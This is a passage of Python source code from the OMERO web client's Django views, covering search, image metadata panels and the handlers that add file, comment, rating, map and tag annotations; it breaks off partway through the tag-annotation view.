                        t = t[0:-1]  # remove 's'
                        if t in (
                            "project",
                            "dataset",
                            "image",
                            "screen",
                            "plate",
                            "well",
                        ):
                            obj = conn.getObject(t, searchById)
                            if obj is not None:
                                foundById.append({"otype": t, "obj": obj})
                except ValueError:
                    # non-numeric token: not an ID lookup
                    pass
    else:
        # simply display the search home page.
        template = "webclient/search/search.html"
    context = {
        "manager": manager,
        "foundById": foundById,
        "resultCount": manager.c_size + len(foundById),
    }
    context["template"] = template
    context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
    return context
@login_required()
@render_response()
def load_metadata_details(request, c_type, c_id, conn=None, share_id=None, **kwargs):
    """
    This page is the right-hand panel 'general metadata', first tab only.
    Shown for Projects, Datasets, Images, Screens, Plates, Wells, Tags etc.
    The data and annotations are loaded by the manager. Display of appropriate
    data is handled by the template.
    """
    # the index of a field within a well
    index = getIntOrDefault(request, "index", 0)
    context = dict()
    # we only expect a single object, but forms can take multiple objects
    # (each 'x and [...] or list()' yields [] unless c_type matches)
    images = c_type == "image" and list(conn.getObjects("Image", [c_id])) or list()
    datasets = (
        c_type == "dataset" and list(conn.getObjects("Dataset", [c_id])) or list()
    )
    projects = (
        c_type == "project" and list(conn.getObjects("Project", [c_id])) or list()
    )
    screens = c_type == "screen" and list(conn.getObjects("Screen", [c_id])) or list()
    plates = c_type == "plate" and list(conn.getObjects("Plate", [c_id])) or list()
    acquisitions = (
        c_type == "acquisition"
        and list(conn.getObjects("PlateAcquisition", [c_id]))
        or list()
    )
    shares = (
        (c_type == "share" or c_type == "discussion")
        and [conn.getShare(c_id)]
        or list()
    )
    wells = c_type == "well" and list(conn.getObjects("Well", [c_id])) or list()
    # we simply set up the annotation form, passing the objects to be
    # annotated.
    selected = {
        "images": c_type == "image" and [c_id] or [],
        "datasets": c_type == "dataset" and [c_id] or [],
        "projects": c_type == "project" and [c_id] or [],
        "screens": c_type == "screen" and [c_id] or [],
        "plates": c_type == "plate" and [c_id] or [],
        "acquisitions": c_type == "acquisition" and [c_id] or [],
        "wells": c_type == "well" and [c_id] or [],
        "shares": ((c_type == "share" or c_type == "discussion") and [c_id] or []),
    }
    initial = {
        "selected": selected,
        "images": images,
        "datasets": datasets,
        "projects": projects,
        "screens": screens,
        "plates": plates,
        "acquisitions": acquisitions,
        "wells": wells,
        "shares": shares,
    }
    form_comment = None
    figScripts = None
    if c_type in ("share", "discussion"):
        # shares/discussions get their own template and comment form
        template = "webclient/annotations/annotations_share.html"
        manager = BaseShare(conn, c_id)
        manager.getAllUsers(c_id)
        manager.getComments(c_id)
        form_comment = CommentAnnotationForm(initial=initial)
    else:
        try:
            manager = BaseContainer(conn, **{str(c_type): long(c_id), "index": index})
        except AttributeError as x:
            return handlerInternalError(request, x)
        if share_id is not None:
            template = "webclient/annotations/annotations_share.html"
            context["share"] = BaseShare(conn, share_id)
        else:
            template = "webclient/annotations/metadata_general.html"
            context["canExportAsJpg"] = manager.canExportAsJpg(request)
            context["annotationCounts"] = manager.getAnnotationCounts()
            figScripts = manager.listFigureScripts()
    context["manager"] = manager
    if c_type in ("tag", "tagset"):
        context["insight_ns"] = omero.rtypes.rstring(
            omero.constants.metadata.NSINSIGHTTAGSET
        ).val
    if form_comment is not None:
        context["form_comment"] = form_comment
    context["figScripts"] = figScripts
    context["template"] = template
    context["webclient_path"] = reverse("webindex")
    return context
@login_required()
@render_response()
def load_metadata_preview(request, c_type, c_id, conn=None, share_id=None, **kwargs):
    """
    This is the image 'Preview' tab for the right-hand panel.

    Collects one rendering definition per owner (deduplicated, keeping the
    highest ID) and marshals them into rdef query strings for the client.
    """
    context = {}
    # the index of a field within a well
    index = getIntOrDefault(request, "index", 0)
    manager = BaseContainer(conn, **{str(c_type): long(c_id)})
    if share_id:
        context["share"] = BaseShare(conn, share_id)
    if c_type == "well":
        # preview the image of the chosen field within the well
        manager.image = manager.well.getImage(index)
    allRdefs = manager.image.getAllRenderingDefs()
    rdefs = {}
    rdefId = manager.image.getRenderingDefId()
    # remove duplicates per user
    for r in allRdefs:
        ownerId = r["owner"]["id"]
        r["current"] = r["id"] == rdefId
        # if duplicate rdefs for user, pick one with highest ID
        if ownerId not in rdefs or rdefs[ownerId]["id"] < r["id"]:
            rdefs[ownerId] = r
    rdefs = rdefs.values()
    # format into rdef strings,
    # E.g. {c: '1|3118:35825$FF0000,2|2086:18975$FFFF00', m: 'c'}
    rdefQueries = []
    for r in rdefs:
        chs = []
        for i, c in enumerate(r["c"]):
            # "-" prefix marks an inactive channel
            act = "-"
            if c["active"]:
                act = ""
            color = c["lut"] if "lut" in c else c["color"]
            reverse = "r" if c["inverted"] else "-r"
            chs.append(
                "%s%s|%s:%s%s$%s" % (act, i + 1, c["start"], c["end"], reverse, color)
            )
        rdefQueries.append(
            {
                "id": r["id"],
                "owner": r["owner"],
                "c": ",".join(chs),
                "m": r["model"] == "greyscale" and "g" or "c",
            }
        )
    max_w, max_h = conn.getMaxPlaneSize()
    size_x = manager.image.getSizeX()
    size_y = manager.image.getSizeY()
    # flag images larger than the max plane size so the client tiles them
    context["tiledImage"] = (size_x * size_y) > (max_w * max_h)
    context["manager"] = manager
    context["rdefsJson"] = json.dumps(rdefQueries)
    context["rdefs"] = rdefs
    context["template"] = "webclient/annotations/metadata_preview.html"
    return context
@login_required()
@render_response()
def load_metadata_hierarchy(request, c_type, c_id, conn=None, **kwargs):
    """
    Load the ancestors of the specified object for display in a static tree.

    Used by an AJAX call from the metadata_general panel.
    """
    container_kwargs = {str(c_type): long(c_id)}
    return {
        "manager": BaseContainer(conn, **container_kwargs),
        "template": "webclient/annotations/metadata_hierarchy.html",
    }
@login_required()
@render_response()
def load_metadata_acquisition(
    request, c_type, c_id, conn=None, share_id=None, **kwargs
):
    """
    The acquisition tab of the right-hand panel. Only loaded for images.
    TODO: urls regex should make sure that c_type is only 'image' OR 'well'

    Builds unbound metadata forms for everything found on the image:
    channels (with light path, detector and light source settings),
    objective, imaging environment, stage label, and the instrument's
    microscope/objectives/filters/dichroics/detectors/light sources.
    Much of this is skipped inside a share context (see ticket 9853).
    """
    try:
        if c_type in ("share", "discussion"):
            template = "webclient/annotations/annotations_share.html"
            manager = BaseShare(conn, c_id)
            manager.getAllUsers(c_id)
            manager.getComments(c_id)
        else:
            template = "webclient/annotations/metadata_acquisition.html"
            manager = BaseContainer(conn, **{str(c_type): long(c_id)})
    except AttributeError as x:
        return handlerInternalError(request, x)
    form_environment = None
    form_objective = None
    form_microscope = None
    form_instrument_objectives = list()
    form_stageLabel = None
    form_filters = list()
    form_dichroics = list()
    form_detectors = list()
    form_channels = list()
    form_lasers = list()
    # light-source type enums, chosen per light source's OMERO_CLASS below
    lasertypes = list(conn.getEnumerationEntries("LaserType"))
    arctypes = list(conn.getEnumerationEntries("ArcType"))
    filamenttypes = list(conn.getEnumerationEntries("FilamentType"))
    # various enums we need for the forms (don't load unless needed)
    mediums = None
    immersions = None
    corrections = None
    if c_type == "image":
        if share_id is None:
            manager.companionFiles()
        manager.channelMetadata()
        # build one dict of forms per channel
        for theC, ch in enumerate(manager.channel_metadata):
            logicalChannel = ch.getLogicalChannel()
            if logicalChannel is not None:
                channel = dict()
                channel["form"] = MetadataChannelForm(
                    initial={
                        "logicalChannel": logicalChannel,
                        "exWave": ch.getExcitationWave(units=True),
                        "emWave": ch.getEmissionWave(units=True),
                        "illuminations": list(
                            conn.getEnumerationEntries("IlluminationI")
                        ),
                        "contrastMethods": list(
                            conn.getEnumerationEntries("ContrastMethodI")
                        ),
                        "modes": list(conn.getEnumerationEntries("AcquisitionModeI")),
                    }
                )
                # 9853 Much metadata is not available to 'shares'
                if share_id is None:
                    lightPath = logicalChannel.getLightPath()
                    if lightPath is not None:
                        channel["form_dichroic"] = None
                        channel["form_excitation_filters"] = list()
                        channel["form_emission_filters"] = list()
                        lightPathDichroic = lightPath.getDichroic()
                        if lightPathDichroic is not None:
                            channel["form_dichroic"] = MetadataDichroicForm(
                                initial={"dichroic": lightPathDichroic}
                            )
                        filterTypes = list(conn.getEnumerationEntries("FilterTypeI"))
                        for f in lightPath.getEmissionFilters():
                            channel["form_emission_filters"].append(
                                MetadataFilterForm(
                                    initial={"filter": f, "types": filterTypes}
                                )
                            )
                        for f in lightPath.getExcitationFilters():
                            channel["form_excitation_filters"].append(
                                MetadataFilterForm(
                                    initial={"filter": f, "types": filterTypes}
                                )
                            )
                    detectorSettings = logicalChannel.getDetectorSettings()
                    if (
                        detectorSettings._obj is not None
                        and detectorSettings.getDetector()
                    ):
                        channel["form_detector_settings"] = MetadataDetectorForm(
                            initial={
                                "detectorSettings": detectorSettings,
                                "detector": detectorSettings.getDetector(),
                                "types": list(
                                    conn.getEnumerationEntries("DetectorTypeI")
                                ),
                                "binnings": list(conn.getEnumerationEntries("Binning")),
                            }
                        )
                    lightSourceSettings = logicalChannel.getLightSourceSettings()
                    if (
                        lightSourceSettings is not None
                        and lightSourceSettings._obj is not None
                    ):
                        lightSrc = lightSourceSettings.getLightSource()
                        if lightSrc is not None:
                            lstypes = lasertypes
                            if lightSrc.OMERO_CLASS == "Arc":
                                lstypes = arctypes
                            elif lightSrc.OMERO_CLASS == "Filament":
                                lstypes = filamenttypes
                            channel["form_light_source"] = MetadataLightSourceForm(
                                initial={
                                    "lightSource": lightSrc,
                                    "lightSourceSettings": lightSourceSettings,
                                    "lstypes": lstypes,
                                    "mediums": list(
                                        conn.getEnumerationEntries("LaserMediumI")
                                    ),
                                    "pulses": list(
                                        conn.getEnumerationEntries("PulseI")
                                    ),
                                }
                            )
                # TODO: We don't display filter sets here yet since they are
                # not populated on Import by BioFormats.
                channel["label"] = ch.getLabel()
                color = ch.getColor()
                channel["color"] = color is not None and color.getHtml() or None
                planeInfo = (
                    manager.image
                    and manager.image.getPrimaryPixels().copyPlaneInfo(
                        theC=theC, theZ=0
                    )
                )
                # per-timepoint deltaT/exposure (seconds); skip planes with
                # neither value set
                plane_info = []
                for pi in planeInfo:
                    deltaT = pi.getDeltaT(units="SECOND")
                    exposure = pi.getExposureTime(units="SECOND")
                    if deltaT is None and exposure is None:
                        continue
                    if deltaT is not None:
                        deltaT = deltaT.getValue()
                    if exposure is not None:
                        exposure = exposure.getValue()
                    plane_info.append(
                        {"theT": pi.theT, "deltaT": deltaT, "exposureTime": exposure}
                    )
                channel["plane_info"] = plane_info
                form_channels.append(channel)
        # for wells, use the well-sample's image; otherwise fall back to
        # the manager's image
        try:
            image = manager.well.getWellSample().image()
        except Exception:
            image = manager.image
        if share_id is None:  # 9853
            if image.getObjectiveSettings() is not None:
                # load the enums if needed and create our Objective Form
                if mediums is None:
                    mediums = list(conn.getEnumerationEntries("MediumI"))
                if immersions is None:
                    immersions = list(conn.getEnumerationEntries("ImmersionI"))
                if corrections is None:
                    corrections = list(conn.getEnumerationEntries("CorrectionI"))
                form_objective = MetadataObjectiveSettingsForm(
                    initial={
                        "objectiveSettings": image.getObjectiveSettings(),
                        "objective": image.getObjectiveSettings().getObjective(),
                        "mediums": mediums,
                        "immersions": immersions,
                        "corrections": corrections,
                    }
                )
            if image.getImagingEnvironment() is not None:
                form_environment = MetadataEnvironmentForm(initial={"image": image})
            if image.getStageLabel() is not None:
                form_stageLabel = MetadataStageLabelForm(initial={"image": image})
            instrument = image.getInstrument()
            if instrument is not None:
                if instrument.getMicroscope() is not None:
                    form_microscope = MetadataMicroscopeForm(
                        initial={
                            "microscopeTypes": list(
                                conn.getEnumerationEntries("MicroscopeTypeI")
                            ),
                            "microscope": instrument.getMicroscope(),
                        }
                    )
                objectives = instrument.getObjectives()
                for o in objectives:
                    # load the enums if needed and create our Objective Form
                    if mediums is None:
                        mediums = list(conn.getEnumerationEntries("MediumI"))
                    if immersions is None:
                        immersions = list(conn.getEnumerationEntries("ImmersionI"))
                    if corrections is None:
                        corrections = list(conn.getEnumerationEntries("CorrectionI"))
                    obj_form = MetadataObjectiveForm(
                        initial={
                            "objective": o,
                            "mediums": mediums,
                            "immersions": immersions,
                            "corrections": corrections,
                        }
                    )
                    form_instrument_objectives.append(obj_form)
                filters = list(instrument.getFilters())
                if len(filters) > 0:
                    for f in filters:
                        form_filter = MetadataFilterForm(
                            initial={
                                "filter": f,
                                "types": list(
                                    conn.getEnumerationEntries("FilterTypeI")
                                ),
                            }
                        )
                        form_filters.append(form_filter)
                dichroics = list(instrument.getDichroics())
                for d in dichroics:
                    form_dichroic = MetadataDichroicForm(initial={"dichroic": d})
                    form_dichroics.append(form_dichroic)
                detectors = list(instrument.getDetectors())
                if len(detectors) > 0:
                    for d in detectors:
                        form_detector = MetadataDetectorForm(
                            initial={
                                "detectorSettings": None,
                                "detector": d,
                                "types": list(
                                    conn.getEnumerationEntries("DetectorTypeI")
                                ),
                            }
                        )
                        form_detectors.append(form_detector)
                lasers = list(instrument.getLightSources())
                if len(lasers) > 0:
                    for laser in lasers:
                        lstypes = lasertypes
                        if laser.OMERO_CLASS == "Arc":
                            lstypes = arctypes
                        elif laser.OMERO_CLASS == "Filament":
                            lstypes = filamenttypes
                        form_laser = MetadataLightSourceForm(
                            initial={
                                "lightSource": laser,
                                "lstypes": lstypes,
                                "mediums": list(
                                    conn.getEnumerationEntries("LaserMediumI")
                                ),
                                "pulses": list(conn.getEnumerationEntries("PulseI")),
                            }
                        )
                        form_lasers.append(form_laser)
    # TODO: remove this 'if' since we should only have c_type = 'image'?
    context = {"manager": manager, "share_id": share_id}
    if c_type not in ("share", "discussion", "tag"):
        context["form_channels"] = form_channels
        context["form_environment"] = form_environment
        context["form_objective"] = form_objective
        context["form_microscope"] = form_microscope
        context["form_instrument_objectives"] = form_instrument_objectives
        context["form_filters"] = form_filters
        context["form_dichroics"] = form_dichroics
        context["form_detectors"] = form_detectors
        context["form_lasers"] = form_lasers
        context["form_stageLabel"] = form_stageLabel
    context["template"] = template
    return context
@login_required()
@render_response()
def load_original_metadata(request, imageId, conn=None, share_id=None, **kwargs):
    """
    Load the original (as-imported) metadata for an image.

    Returns a context dict for the original-metadata template, or a
    408 response if reading the metadata hits a lock timeout.
    """
    image = conn.getObject("Image", imageId)
    if image is None:
        raise Http404("No Image found with ID %s" % imageId)
    context = {
        "template": "webclient/annotations/original_metadata.html",
        "imageId": image.getId(),
    }
    try:
        metadata = image.loadOriginalMetadata()
    except omero.LockTimeout:
        # 408 is Request Timeout
        return HttpResponse(content="LockTimeout", status=408)
    if metadata is not None:
        context["original_metadata"] = metadata[0]
        context["global_metadata"] = metadata[1]
        context["series_metadata"] = metadata[2]
    return context
###########################################################################
# ACTIONS
# Annotation in the right-hand panel is handled the same way for single
# objects (metadata_general.html)
# AND for batch annotation (batch_annotate.html) by 4 forms:
# Comment (this is loaded in the initial page)
# Tags (the empty form is in the initial page but fields are loaded via AJAX)
# Local File (this is loaded in the initial page)
# Existing File (the empty form is in the initial page but field is loaded via
# AJAX)
#
# In each case, the form itself contains hidden fields to specify the
# object(s) being annotated
# All forms inherit from a single form that has these fields.
def getObjects(request, conn=None):
    """
    Prepare objects for use in the annotation forms.

    These objects are required by the form superclass to populate hidden
    fields, so we know what we're annotating on submission.
    """
    params = request.GET or request.POST

    def _load(param, ome_type):
        # fetch the objects for one request parameter, or an empty list
        ids = params.getlist(param)
        if not ids:
            return list()
        return list(conn.getObjects(ome_type, ids))

    images = _load("image", "Image")
    datasets = _load("dataset", "Dataset")
    projects = _load("project", "Project")
    screens = _load("screen", "Screen")
    plates = _load("plate", "Plate")
    acquisitions = _load("acquisition", "PlateAcquisition")
    # shares are looked up individually; only the first ID is used
    share_ids = params.getlist("share")
    shares = [conn.getShare(share_ids[0])] if share_ids else list()
    wells = _load("well", "Well")
    return {
        "image": images,
        "dataset": datasets,
        "project": projects,
        "screen": screens,
        "plate": plates,
        "acquisition": acquisitions,
        "well": wells,
        "share": shares,
    }
def getIds(request):
    """
    Used by forms to indicate the currently selected objects prepared above.

    Returns a dict keyed by the plural type name, each value being the list
    of selected IDs from the request.
    """
    params = request.GET or request.POST
    # request parameter name -> key used in the 'selected' dict
    plural = {
        "image": "images",
        "dataset": "datasets",
        "project": "projects",
        "screen": "screens",
        "plate": "plates",
        "acquisition": "acquisitions",
        "well": "wells",
        "share": "shares",
    }
    return {name: params.getlist(param) for param, name in plural.items()}
@login_required()
@render_response()
def batch_annotate(request, conn=None, **kwargs):
    """
    This page gives a form for batch annotation.
    Local File form and Comment form are loaded. Other forms are loaded via
    AJAX
    """
    objs = getObjects(request, conn)
    # get groups for selected objects - setGroup() and create links
    obj_ids = []
    obj_labels = []
    groupIds = set()
    annotationBlocked = False
    for key in objs:
        obj_ids += ["%s=%s" % (key, o.id) for o in objs[key]]
        for o in objs[key]:
            groupIds.add(o.getDetails().group.id.val)
            if not o.canAnnotate():
                annotationBlocked = (
                    "Can't add annotations because you don't" " have permissions"
                )
            obj_labels.append({"type": key.title(), "id": o.id, "name": o.getName()})
    # e.g. "image=1&image=2" and "image-1|image-2" forms of the selection
    obj_string = "&".join(obj_ids)
    link_string = "|".join(obj_ids).replace("=", "-")
    if len(groupIds) == 0:
        # No supported objects found.
        # If multiple tags / tagsets selected, return placeholder
        if (
            len(request.GET.getlist("tag")) > 0
            or len(request.GET.getlist("tagset")) > 0
        ):
            return HttpResponse("<h2>Can't batch annotate tags</h2>")
        else:
            return handlerInternalError(request, "No objects found")
    # pick an arbitrary group from the set for the service context
    groupId = list(groupIds)[0]
    conn.SERVICE_OPTS.setOmeroGroup(groupId)
    manager = BaseContainer(conn)
    figScripts = manager.listFigureScripts(objs)
    canExportAsJpg = manager.canExportAsJpg(request, objs)
    # fileset info (download sizes) is only relevant when images are selected
    filesetInfo = None
    iids = []
    if "image" in objs and len(objs["image"]) > 0:
        iids = [i.getId() for i in objs["image"]]
    if len(iids) > 0:
        filesetInfo = conn.getFilesetFilesInfo(iids)
        archivedInfo = conn.getArchivedFilesInfo(iids)
        filesetInfo["count"] += archivedInfo["count"]
        filesetInfo["size"] += archivedInfo["size"]
    context = {
        "iids": iids,
        "obj_string": obj_string,
        "link_string": link_string,
        "obj_labels": obj_labels,
        "batch_ann": True,
        "figScripts": figScripts,
        "canExportAsJpg": canExportAsJpg,
        "filesetInfo": filesetInfo,
        "annotationBlocked": annotationBlocked,
        "differentGroups": False,
    }
    if len(groupIds) > 1:
        context["annotationBlocked"] = (
            "Can't add annotations because" " objects are in different groups"
        )
        context["differentGroups"] = True  # E.g. don't run scripts etc
    context["canDownload"] = manager.canDownload(objs)
    context["template"] = "webclient/annotations/batch_annotate.html"
    context["webclient_path"] = reverse("webindex")
    context["annotationCounts"] = manager.getBatchAnnotationCounts(
        getObjects(request, conn)
    )
    return context
@login_required()
@render_response()
def annotate_file(request, conn=None, **kwargs):
    """
    On 'POST', This handles attaching an existing file-annotation(s) and/or
    upload of a new file to one or more objects
    Otherwise it generates the form for choosing file-annotations & local
    files.
    """
    oids = getObjects(request, conn)
    selected = getIds(request)
    initial = {
        "selected": selected,
        "images": oids["image"],
        "datasets": oids["dataset"],
        "projects": oids["project"],
        "screens": oids["screen"],
        "plates": oids["plate"],
        "acquisitions": oids["acquisition"],
        "wells": oids["well"],
    }
    # Use the first object we find to set context (assume all objects are in
    # same group!)
    for obs in oids.values():
        if len(obs) > 0:
            conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    obj_count = sum([len(selected[types]) for types in selected])
    if obj_count == 0:
        raise Http404("Need to specify objects via e.g. ?image=1")
    # Get appropriate manager, either to list available Files to add to single
    # object, or list ALL Files (multiple objects)
    manager = None
    if obj_count == 1:
        # find the single selected type/id ("images" -> "image" etc.)
        for t in selected:
            if len(selected[t]) > 0:
                o_type = t[:-1]  # "images" -> "image"
                o_id = selected[t][0]
                break
        if o_type in (
            "dataset",
            "project",
            "image",
            "screen",
            "plate",
            "acquisition",
            "well",
            "comment",
            "file",
            "tag",
            "tagset",
        ):
            if o_type == "tagset":
                # TODO: this should be handled by the BaseContainer
                o_type = "tag"
            kw = {}
            if o_type is not None and int(o_id) > 0:
                kw[str(o_type)] = int(o_id)
            try:
                manager = BaseContainer(conn, **kw)
            except AttributeError as x:
                return handlerInternalError(request, x)
    if manager is not None:
        files = manager.getFilesByObject()
    else:
        manager = BaseContainer(conn)
        for dtype, objs in oids.items():
            if len(objs) > 0:
                # NB: we only support a single data-type now. E.g. 'image' OR
                # 'dataset' etc.
                files = manager.getFilesByObject(
                    parent_type=dtype, parent_ids=[o.getId() for o in objs]
                )
                break
    # NOTE(review): if IDs were selected but none of the objects could be
    # loaded (all oids lists empty), 'files' is never bound and the next
    # line raises NameError - confirm whether that case can occur.
    initial["files"] = files
    if request.method == "POST":
        # handle form submission
        form_file = FilesAnnotationForm(initial=initial, data=request.POST.copy())
        if form_file.is_valid():
            # Link existing files...
            files = form_file.cleaned_data["files"]
            added_files = []
            if files is not None and len(files) > 0:
                added_files = manager.createAnnotationsLinks("file", files, oids)
            # upload new file
            fileupload = (
                "annotation_file" in request.FILES
                and request.FILES["annotation_file"]
                or None
            )
            if fileupload is not None and fileupload != "":
                newFileId = manager.createFileAnnotations(fileupload, oids)
                added_files.append(newFileId)
            return JsonResponse({"fileIds": added_files})
        else:
            return HttpResponse(form_file.errors)
    else:
        form_file = FilesAnnotationForm(initial=initial)
    context = {"form_file": form_file}
    template = "webclient/annotations/files_form.html"
    context["template"] = template
    return context
@login_required()
@render_response()
def annotate_rating(request, conn=None, **kwargs):
    """
    Add or update a Rating annotation on one or more objects.

    POST only; the rating value comes from the 'rating' parameter.
    """
    if request.method != "POST":
        raise Http404("Only POST supported")
    score = getIntOrDefault(request, "rating", 0)
    targets = getObjects(request, conn)
    # apply the same rating to every selected object
    for obj_list in targets.values():
        for obj in obj_list:
            obj.setRating(score)
    # return a simple success summary
    return JsonResponse({"success": True})
@login_required()
@render_response()
def annotate_comment(request, conn=None, **kwargs):
    """Handle adding Comments to one or more objects
    Unbound instance of Comment form not available.
    If the form has been submitted, a bound instance of the form
    is created using request.POST"""
    if request.method != "POST":
        raise Http404("Unbound instance of form not available.")
    oids = getObjects(request, conn)
    selected = getIds(request)
    initial = {
        "selected": selected,
        "images": oids["image"],
        "datasets": oids["dataset"],
        "projects": oids["project"],
        "screens": oids["screen"],
        "plates": oids["plate"],
        "acquisitions": oids["acquisition"],
        "wells": oids["well"],
        "shares": oids["share"],
    }
    # Use the first object we find to set context (assume all objects are in
    # same group!) this does not apply to share
    if len(oids["share"]) < 1:
        for obs in oids.values():
            if len(obs) > 0:
                conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    # Handle form submission...
    form_multi = CommentAnnotationForm(initial=initial, data=request.POST.copy())
    if form_multi.is_valid():
        # In each case below, we pass the {'object_type': [ids]} map
        content = form_multi.cleaned_data["comment"]
        if content is not None and content != "":
            if oids["share"] is not None and len(oids["share"]) > 0:
                sid = oids["share"][0].id
                manager = BaseShare(conn, sid)
                # host URL is embedded in the share-comment notification
                host = "%s?server=%i" % (
                    request.build_absolute_uri(
                        reverse("load_template", args=["public"])
                    ),
                    int(conn.server_id),
                )
                textAnn = manager.addComment(host, content)
                # For shares we need to return html for display...
                context = {
                    "tann": textAnn,
                    "added_by": conn.getUserId(),
                    "template": "webclient/annotations/comment.html",
                }
            else:
                # ...otherwise Comments are re-loaded by AJAX json
                # so we don't *need* to return anything
                manager = BaseContainer(conn)
                annId = manager.createCommentAnnotations(content, oids)
                context = {"annId": annId, "added_by": conn.getUserId()}
        # NOTE(review): if 'comment' is empty, 'context' is never bound and
        # this raises UnboundLocalError - presumably form validation rejects
        # empty comments before reaching here; confirm.
        return context
    else:
        # TODO: handle invalid form error
        return HttpResponse(str(form_multi.errors))
@login_required()
@render_response()
def annotate_map(request, conn=None, **kwargs):
    """
    Handle adding Map Annotations to one or more objects
    POST data "mapAnnotation" should be list of ['key':'value'] pairs.

    With no "annId" POSTed, new annotation(s) are created (one per object
    when "duplicate" is true, otherwise a single shared annotation);
    otherwise the existing annotations are updated, or deleted when the
    submitted data is empty.
    """
    if request.method != "POST":
        raise Http404(
            "Need to POST map annotation data as list of" " ['key', 'value'] pairs"
        )
    oids = getObjects(request, conn)
    # Use the first object we find to set context (assume all objects are in
    # same group!)
    # this does not apply to share
    if len(oids["share"]) < 1:
        for obs in oids.values():
            if len(obs) > 0:
                conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    data = request.POST.get("mapAnnotation")
    data = json.loads(data)
    annIds = request.POST.getlist("annId")
    ns = request.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
    # Create a new annotation
    if len(annIds) == 0 and len(data) > 0:
        # BUGFIX: the comparison result was previously discarded, leaving
        # 'duplicate' as a non-empty (always truthy) string such as "false",
        # which made the shared-annotation branch below unreachable.
        duplicate = request.POST.get("duplicate", "false").lower() == "true"
        # For 'client' map annotations, we enforce 1 annotation per object
        if ns == omero.constants.metadata.NSCLIENTMAPANNOTATION:
            duplicate = True
        if duplicate:
            # Create a new Map Annotation for each object:
            for k, objs in oids.items():
                for obj in objs:
                    ann = omero.gateway.MapAnnotationWrapper(conn)
                    ann.setValue(data)
                    ann.setNs(ns)
                    ann.save()
                    annIds.append(ann.getId())
                    obj.linkAnnotation(ann)
        else:
            # Create single Map Annotation and link to all objects
            ann = omero.gateway.MapAnnotationWrapper(conn)
            ann.setValue(data)
            ann.setNs(ns)
            ann.save()
            annIds.append(ann.getId())
            for k, objs in oids.items():
                for obj in objs:
                    obj.linkAnnotation(ann)
    # Or update existing annotations
    else:
        for annId in annIds:
            ann = conn.getObject("MapAnnotation", annId)
            if ann is None:
                continue
            if len(data) > 0:
                ann.setValue(data)
                ann.save()
            else:
                # Delete if no data
                handle = conn.deleteObjects("/Annotation", [annId])
                try:
                    conn._waitOnCmd(handle)
                finally:
                    handle.close()
        if len(data) == 0:
            annIds = None
    return {"annId": annIds}
@login_required()
@render_response()
def marshal_tagging_form_data(request, conn=None, **kwargs):
    """
    Provide JSON data to ome.tagging_form.js.

    The 'jsonmode' GET parameter selects the payload: 'tagcount',
    'tags', 'desc' or 'owners'.
    """
    group = get_long_or_default(request, "group", -1)
    conn.SERVICE_OPTS.setOmeroGroup(str(group))
    try:
        offset = int(request.GET.get("offset"))
        limit = int(request.GET.get("limit", 1000))
    except Exception:
        # missing/invalid paging params -> load everything
        offset = limit = None
    jsonmode = request.GET.get("jsonmode")
    if jsonmode == "tagcount":
        return dict(tag_count=conn.getTagCount())
    manager = BaseContainer(conn)
    manager.loadTagsRecursive(eid=-1, offset=offset, limit=limit)
    all_tags = manager.tags_recursive
    all_tags_owners = manager.tags_recursive_owners
    if jsonmode == "tags":
        # tag information without descriptions
        return [(tid, text, owner, size) for tid, desc, text, owner, size in all_tags]
    if jsonmode == "desc":
        # map of tag-id -> description
        return {tid: desc for tid, desc, text, owner, size in all_tags}
    if jsonmode == "owners":
        # owner information
        return all_tags_owners
    return HttpResponse()
@login_required()
@render_response()
def annotate_tags(request, conn=None, **kwargs):
    """
    This handles creation AND submission of Tags form, adding new AND/OR
    existing tags to one or more objects

    GET renders the unbound tagging form; POST links/unlinks existing tags
    and creates any new tags submitted via the 'newtags' formset.
    """
    oids = getObjects(request, conn)
    selected = getIds(request)
    obj_count = sum([len(selected[types]) for types in selected])
    # Get appropriate manager, either to list available Tags to add to single
    # object, or list ALL Tags (multiple objects)
    manager = None
    self_id = conn.getEventContext().userId
    tags = []
    # Use the first object we find to set context (assume all objects are
    # in same group!)
    for obs in oids.values():
        if len(obs) > 0:
            conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    # Make a list of all current tags
    # As would be on right column of tagging dialog...
    taglist, users = tree.marshal_annotations(
        conn,
        project_ids=selected["projects"],
        dataset_ids=selected["datasets"],
        image_ids=selected["images"],
        screen_ids=selected["screens"],
        plate_ids=selected["plates"],
        run_ids=selected["acquisitions"],
        well_ids=selected["wells"],
        ann_type="tag",
        # If we reach this limit we'll get some tags not removed
        limit=ANNOTATIONS_LIMIT,
    )
    # map of experimenter id -> experimenter dict, for owner names below
    userMap = {}
    for exp in users:
        userMap[exp["id"]] = exp
    # For batch annotate, only include tags that user has added to all objects
    if obj_count > 1:
        # count my links
        myLinkCount = {}
        for t in taglist:
            tid = t["id"]
            if tid not in myLinkCount:
                myLinkCount[tid] = 0
            if t["link"]["owner"]["id"] == self_id:
                myLinkCount[tid] += 1
        # filter
        taglist = [t for t in taglist if myLinkCount[t["id"]] == obj_count]
    selected_tags = []
    for tag in taglist:
        linkOwnerId = tag["link"]["owner"]["id"]
        owner = userMap[linkOwnerId]
        ownerName = "%s %s" % (owner["firstName"], owner["lastName"])
        canDelete = True
        created = tag["link"]["date"]
        linkOwned = linkOwnerId == self_id
        selected_tags.append(
            (tag["id"], self_id, ownerName, canDelete, created, linkOwned)
        )
    # selected_tags is really a list of tag LINKS.
    # May be several links per tag.id
    selected_tags.sort(key=lambda x: x[0])
    initial = {
        "selected": selected,
        "images": oids["image"],
        "datasets": oids["dataset"],
        "projects": oids["project"],
        "screens": oids["screen"],
        "plates": oids["plate"],
        "acquisitions": oids["acquisition"],
        "wells": oids["well"],
    }
    if request.method == "POST":
        # handle form submission
        form_tags = TagsAnnotationForm(initial=initial, data=request.POST.copy())
        newtags_formset = NewTagsAnnotationFormSet(
            prefix="newtags", data=request.POST.copy()
        )
        # Create new tags or Link existing tags...
        if form_tags.is_valid() and newtags_formset.is_valid():
            # filter down previously selected tags to the ones linked by
            # current user
            selected_tag_ids = [stag[0] for stag in selected_tags if stag[5]]
            # Remove duplicates from tag IDs
            selected_tag_ids = list(set(selected_tag_ids))
            post_tags = list(form_tags.cleaned_data["tags"])
